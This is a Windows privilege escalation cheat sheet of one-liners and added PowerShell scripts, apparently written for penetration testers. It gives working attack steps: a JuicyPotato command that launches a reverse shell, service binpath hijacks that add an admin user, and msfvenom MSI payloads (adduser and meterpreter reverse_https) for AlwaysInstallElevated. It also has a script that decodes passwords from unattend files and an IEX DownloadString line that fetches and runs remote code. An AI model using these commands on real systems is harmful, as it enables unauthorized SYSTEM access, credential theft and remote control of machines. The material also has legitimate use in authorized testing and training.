Windows Privilege Escalation

A collection of goodies, one-liners, and to-dos to keep in your back pocket!

System

Check for goodies in environment variables

set

Get OS and architecture

systeminfo

systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type"

View recent KBs installed

wmic qfe

wmic qfe get Caption,Description,HotFixID,InstalledOn

wmic qfe list full

Local storage

wmic logicaldisk get caption,description,providername

Get .NET Framework versions (the winPEAS .exe build needs a .NET runtime; check which one is present before dropping it)

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v Version

dir /b /ad /o-n %systemroot%\Microsoft.NET\Framework\v?.*

  • Enable RDP Access

Users

Get your user

whoami

Get your privileges

whoami /priv

Get your groups

whoami /groups

View other users

net user

net user <username>

View local groups

net localgroup (may fail without an interactive logon session; naming a specific group usually still works)

net localgroup administrators

List scheduled tasks

schtasks /query /fo LIST /v

Network

Get IP addresses

ipconfig /all

Get ARP table

arp -a

Get route table

route print

See what ports are listening and who we are communicating with (the -o column gives the owning PID; match it against tasklist /SVC)

netstat -ano

Passwords

Search the current directory tree (/s recurses, /i is case-insensitive) for .txt, .ini and .config files containing "password"

findstr /si password *.txt *.ini *.config

Search for files that contain password in filename

dir /s *password*

Firewall / AntiVirus

Check for firewall settings (the netsh firewall context is the legacy one; on Windows 7 and later it may only warn or be missing, in which case use the netsh advfirewall context instead)

netsh firewall show state

netsh firewall show config

Get antivirus (the SecurityCenter2 namespace only exists on client SKUs, not on Windows Server)

wmic /node:localhost /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName

Services

Check for running services

net start

wmic service list brief

Check for installed drivers

DRIVERQUERY

Link running processes to services

tasklist /SVC

Get the security descriptor (SDDL string) for every service. Writes two temp files, a and b, in the current directory and removes them afterwards; double the % signs (%%i) if you paste this into a .bat file

sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul

  • Windows XP? You can probably exploit upnphost

Impersonation

whoami /priv

Have SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege? Service accounts such as IIS application pools and MSSQL usually do. JuicyPotato abuses a DCOM activation to capture a SYSTEM token; the trick no longer works on Windows 10 1809 / Server 2019 and later.

You must find a CLSID for the target OS version here: http://ohpe.it/juicy-potato/CLSID/

JuicyPotato.exe -l 1340 -p C:\users\User\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

(-l is a local COM listener port of your choice, -p the program to launch as SYSTEM, -t * tries both CreateProcessWithTokenW and CreateProcessAsUser, -c the CLSID.)
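A quick go/no-go check before reaching for JuicyPotato, added here as an example (it is not from the original page or from the JuicyPotato project). It reports whether the current token holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (whoami /priv lists privileges whether they are Enabled or Disabled; JuicyPotato enables them itself) and whether the OS build predates the DCOM hardening that shipped in Windows 10 1809 / Server 2019 (build 17763), after which the technique fails.

```powershell
# Added example, not from the original page. Read-only; needs no admin rights.
function Get-ImpersonationStatus {
    # whoami /priv prints one privilege per line, name in the first column,
    # regardless of whether the privilege is currently enabled.
    $privs = whoami /priv |
             Where-Object { $_ -match '^Se\w+Privilege' } |
             ForEach-Object { ($_ -split '\s+')[0] }

    # Build number from the registry (works on PowerShell 2.0+).
    $cv    = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $build = [int]$cv.CurrentBuildNumber

    $hasImpersonate = $privs -contains 'SeImpersonatePrivilege'
    $hasAssign      = $privs -contains 'SeAssignPrimaryTokenPrivilege'

    [pscustomobject]@{
        User                         = (whoami)
        SeImpersonatePrivilege       = $hasImpersonate
        SeAssignPrimaryTokenPrivilege = $hasAssign
        Build                        = $build
        # JuicyPotato's DCOM activation trick was broken in build 17763 (1809 / Server 2019).
        JuicyPotatoViable            = ($hasImpersonate -or $hasAssign) -and ($build -lt 17763)
    }
}

Get-ImpersonationStatus | Format-List
```

If JuicyPotatoViable is false only because of the build number, the privilege is still abusable; you just need one of the newer token-impersonation tools written for post-1809 systems rather than JuicyPotato.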

Unquoted Service Paths

Find unquoted binary paths in services (auto-start, outside C:\Windows, and no quote character anywhere in the path)

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Check permissions: can we write to one of the directories along the path, and can we start/stop the service (if not, an auto-start service still picks up the payload at the next reboot)?

accesschk.exe -uwcqv "Authenticated Users" * /accepteula

icacls [Directory]

sc stop [service] && sc start [service]

For an unquoted path such as C:\Program Files\Some Dir\svc.exe, Windows tries C:\Program.exe and then C:\Program Files\Some.exe before the real binary, so drop the payload under one of those names in whichever directory is writable and restart the service. If the service ACL instead grants us SERVICE_CHANGE_CONFIG, point the binary path at the payload directly (note the space after binpath=, which sc requires)

sc config [service] binpath= "C:\path\to\malicious.exe"

sc stop [service]

sc start [service]

If we don't want a reverse shell exe we can make a new user instead. net.exe is not a real service, so sc start reports a timeout error, but the command has already run as SYSTEM; change binpath a second time to add the new account to the local Administrators group.

sc config [service] binpath= "net user admin password /add"
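The following script is an added example (not code from the original page) that covers both the "Get permission string for all services" one-liner above and this Unquoted Service Paths section in one read-only pass: it enumerates every service, computes the exact file names an unquoted path lets you hijack and tests whether the current user can really write to those directories, and parses each service's SDDL from sc.exe sdshow to flag ACEs that give low-privilege SIDs the right to reconfigure or take over the service. The list of "low-privilege" SID abbreviations and of "dangerous" rights pairs is my choice and can be widened.

```powershell
# Added example, not from the original page. Requires no admin rights and changes nothing.
# Inside PowerShell `sc` is an alias for Set-Content, so the binary is always called as sc.exe.

# Well-known SID abbreviations meaning "anyone": Everyone, Authenticated Users, Users, Interactive, Guests.
$LowPrivSids = 'WD', 'AU', 'BU', 'IU', 'BG'
# SDDL rights pairs that let the holder retarget or take over a service:
# DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER, GA/GW = generic all/write.
$DangerousRights = 'DC', 'WD', 'WO', 'GA', 'GW'

function Test-DirectoryWritable {
    # Real write test (create and delete a random file) rather than reading icacls output,
    # which is easy to misjudge when inherited ACEs are involved.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::Create($probe).Dispose()
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Get-HijackCandidates {
    # For the unquoted path  C:\Program Files\My App\bin\svc.exe -arg  CreateProcess tries
    # C:\Program.exe and then C:\Program Files\My.exe before the real binary. Returns each
    # file that could be dropped and the directory it would have to be written to.
    param([string]$PathName)
    if ($PathName.StartsWith('"')) { return @() }                 # properly quoted, not exploitable
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if (-not $m.Success) { return @() }
    $exePath = $m.Groups[1].Value                                # drop arguments after the .exe
    $out = @()
    $idx = $exePath.IndexOf(' ')
    while ($idx -gt 0) {
        $drop = $exePath.Substring(0, $idx) + '.exe'
        $out += [pscustomobject]@{ DropFile = $drop; Directory = (Split-Path -Parent $drop) }
        $idx = $exePath.IndexOf(' ', $idx + 1)
    }
    return $out
}

function Get-WeakServiceAces {
    # ACE syntax: (AceType;AceFlags;Rights;ObjectGuid;InheritObjectGuid;Sid).
    # Only Allow ACEs (type A) for low-priv SIDs carrying a dangerous right are reported.
    param([string]$ServiceName)
    $sddl = (& sc.exe sdshow $ServiceName) -join ''
    foreach ($ace in [regex]::Matches($sddl, '\(A;[^;]*;([A-Z]*);;;([^)]+)\)')) {
        $rights = $ace.Groups[1].Value
        $sid    = $ace.Groups[2].Value
        if ($LowPrivSids -notcontains $sid -or $rights.Length % 2 -ne 0) { continue }
        $pairs = for ($i = 0; $i -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) }
        $bad = @($pairs | Where-Object { $DangerousRights -contains $_ })
        if ($bad.Count) {
            [pscustomobject]@{ Service = $ServiceName; Sid = $sid; Rights = ($bad -join ',') }
        }
    }
}

# Offline illustration of the truncation logic on a constructed path:
Get-HijackCandidates 'C:\Program Files\My App\bin\svc.exe -arg' | Format-Table -AutoSize

# Live scan of every service on this host.
$services = Get-CimInstance Win32_Service | Where-Object { $_.PathName }
foreach ($svc in $services) {
    foreach ($c in Get-HijackCandidates $svc.PathName) {
        if (Test-DirectoryWritable $c.Directory) {
            '[UNQUOTED] {0} (start: {1}, runs as {2}): drop payload at {3}' -f $svc.Name, $svc.StartMode, $svc.StartName, $c.DropFile
        }
    }
    foreach ($w in Get-WeakServiceAces $svc.Name) {
        '[WEAK ACL] {0} (runs as {1}): {2} has {3}' -f $w.Service, $svc.StartName, $w.Sid, $w.Rights
    }
}
```

A [WEAK ACL] hit with DC means sc.exe config binpath= works for you directly; an [UNQUOTED] hit only pays off if you can also restart the service (RP/WP in the same ACL), or if it is auto-start and you can wait for or force a reboot. Services running as LocalSystem are the ones worth the effort; check the "runs as" column before bothering.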

AlwaysInstallElevated

Check if enabled (both values must exist and be set to 0x1; one alone is not enough)

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Create msi payload

msfvenom -p windows/adduser USER=admin PASS=password -f msi -o filename.msi

msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[LHOST IP] LPORT=443 -f msi -o filename.msi

Install elevated payload

msiexec /quiet /qn /i C:\Users\filename.msi

Unattended Installs

Check for unattended install files. They may contain passwords for local admin accounts, either in plain text or as Base64 of the UTF-16LE password with the element name ("AdministratorPassword" or "Password") appended, which you strip after decoding.

C:\Windows\Panther\
C:\Windows\Panther\Unattend\
C:\Windows\System32\
C:\Windows\System32\sysprep\

Unattend.xml
unattended.xml
unattend.txt
sysprep.xml
sysprep.inf
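An added example (not from the original page) that walks the directories and file names listed above and pulls credentials out of whatever it finds. XML answer files are parsed and each AdministratorPassword / Password element is decoded per the Unattend.xml rules: plain text when PlainText is true, otherwise Base64 of UTF-16LE(password + element name). INI-style sysprep.inf and .txt files are simply grepped for "password". The sample answer file at the top is constructed inline so the decoder can be exercised offline; it is not a real file from any system.

```powershell
# Added example, not from the original page. Read-only.
$SearchDirs = "$env:SystemRoot\Panther", "$env:SystemRoot\Panther\Unattend",
              "$env:SystemRoot\System32", "$env:SystemRoot\System32\sysprep"
$FileNames  = 'Unattend.xml', 'unattended.xml', 'unattend.txt', 'sysprep.xml', 'sysprep.inf'

function ConvertFrom-UnattendPassword {
    # Value is plain text when <PlainText>true</PlainText>; otherwise Windows Base64-encodes
    # UTF-16LE(password + ElementName), so the element name must be stripped after decoding.
    param([string]$Value, [bool]$PlainText, [string]$ElementName)
    if ($PlainText) { return $Value }
    try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Value)) }
    catch { return "<not base64: $Value>" }
    if ($decoded.EndsWith($ElementName)) {
        $decoded = $decoded.Substring(0, $decoded.Length - $ElementName.Length)
    }
    return $decoded
}

function Get-UnattendCredentials {
    # Namespace-agnostic XPath so it works with or without the urn:schemas-microsoft-com:unattend
    # default namespace. Covers UserAccounts\AdministratorPassword, LocalAccount\Password
    # and AutoLogon\Password.
    param([xml]$Doc)
    $pwNodes = $Doc.SelectNodes("//*[local-name()='AdministratorPassword' or local-name()='Password']")
    foreach ($node in $pwNodes) {
        $valueNode = $node.SelectSingleNode("*[local-name()='Value']")
        if (-not $valueNode) { continue }
        $plainNode = $node.SelectSingleNode("*[local-name()='PlainText']")
        $plain     = [bool]($plainNode -and $plainNode.InnerText -eq 'true')
        $nameNode  = $node.ParentNode.SelectSingleNode("*[local-name()='Name' or local-name()='Username']")
        if ($node.LocalName -eq 'AdministratorPassword') { $account = 'Administrator' }
        elseif ($nameNode)                               { $account = $nameNode.InnerText }
        else                                             { $account = $node.ParentNode.LocalName }
        [pscustomobject]@{
            Account  = $account
            Password = ConvertFrom-UnattendPassword $valueNode.InnerText $plain $node.LocalName
        }
    }
}

# Constructed sample (not a real answer file): one encoded and one plain-text password.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Passw0rd!' + 'AdministratorPassword'))
$sample  = [xml]@"
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword><Value>$encoded</Value><PlainText>false</PlainText></AdministratorPassword>
      </UserAccounts>
      <AutoLogon>
        <Password><Value>S3cret</Value><PlainText>true</PlainText></Password>
        <Username>svc_deploy</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"@
Get-UnattendCredentials $sample | Format-Table -AutoSize

# Live scan of the standard locations.
foreach ($dir in $SearchDirs) {
    foreach ($name in $FileNames) {
        $path = Join-Path $dir $name
        if (-not (Test-Path -LiteralPath $path)) { continue }
        "== $path"
        try   { Get-UnattendCredentials ([xml](Get-Content -LiteralPath $path -Raw)) | Format-Table -AutoSize }
        catch { Select-String -LiteralPath $path -Pattern 'password' -SimpleMatch }   # INI-style files
    }
}
```

The constructed sample decodes back to the two passwords it was built from, which is the check that the suffix-stripping is right. Files under Panther are often left readable by Users long after deployment, so this is worth running even on hardened hosts.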

PowerShell

Run a script without ever touching the disk (Invoke-AllChecks is PowerUp's entry point; the downloaded file must be the PowerShell script itself, since IEX executes text)

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://blah/blah.ps1'); Invoke-AllChecks"

Common Exploits

Here's a list of some common exploits worth investigating when looking at privilege escalation; match them against the output of systeminfo and wmic qfe.

Windows Vista/7 – Elevation of Privileges (UAC Bypass)

Microsoft Windows 7 SP1 (x86) – ‘WebDAV’ Privilege Escalation (MS16-016)

Microsoft Windows 7 SP1 (x86) – Privilege Escalation (MS16-014)

Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) – Privilege Escalation (MS16-032)

CVE-2017-0213: Windows COM Elevation of Privilege Vulnerability

CVE-2019-1253: Windows Elevation of Privilege Vulnerability

CVE-2019-0836: Microsoft Windows 10 1809